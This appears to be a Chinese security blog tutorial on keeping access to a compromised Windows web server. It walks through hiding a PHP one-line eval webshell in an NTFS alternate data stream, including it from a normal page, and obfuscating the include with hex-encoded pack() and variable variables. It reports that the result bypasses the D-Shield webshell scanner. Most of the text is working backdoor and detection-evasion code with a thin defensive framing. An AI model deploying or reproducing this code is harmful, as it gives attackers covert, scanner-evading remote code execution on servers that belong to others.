0X01 前言
未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。
0X02 利用ADS隐藏webshell
关于ADS的介绍,就不再阐述,详见尾部参考资料。
PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种。。。
制作步骤一:创建ADS隐藏文件
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。
问题1:如何查看index.php:hidden.jpg内容呢?
进入文件所在目录,notepad index.php:hidden.jpg 或者 dir /r
问题2:如何删除index.php:hidden.jpg?
直接删除index.php即可
制作步骤二:文件包含
一个正常文件里把这个ADS文件include进去,<?php include(‘index.php:hidden.jpg’)?>,这样子就可以正常解析我们的一句话了。
但是却非常容易被webshell查杀工具查到,看到可疑引用的文件名,分分钟出局了。
制作步骤三:如何绕过检测
这边要解决的是include函数,如何让它检测不出来有可疑引用文件呢?
在某次应急响应事件中,获取到一段代码,这里拿来改造一下。代码如下:
<?php @include(PACK('H*','xx')); ?>
PHP pack() 函数 函数介绍:http://www.w3school.com.cn/php/func_misc_pack.asp
将index.php:hidden.jpg进行hex编码
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
再次用D盾_web查杀进行扫描,还是被查到了。
进一步利用PHP 可变变量进行二次转换,最后得到绕过D盾扫描的姿势如下:
<?php $a="696E6465782E7068703"."A68696464656E2E6A7067"; $b="a"; include(PACK('H*',$$b)) ?>
绕过D盾_web查杀如图:
0X03 最后
权限维持,也是一门很重要的课题,熟悉各种常见的后门技术,并懂得如何进行安全防御。
参考文章:
NTFS中的ADS的一些问题 https://www.i0day.com/733.html
一个用ADS(供选数据流)隐藏Windows后门的方法 http://www.freebuf.com/articles/73270.html
Windows中隐藏文件的捷径---------NTFS文件流(ADS) http://blog.csdn.net/c395565746c/article/details/5336260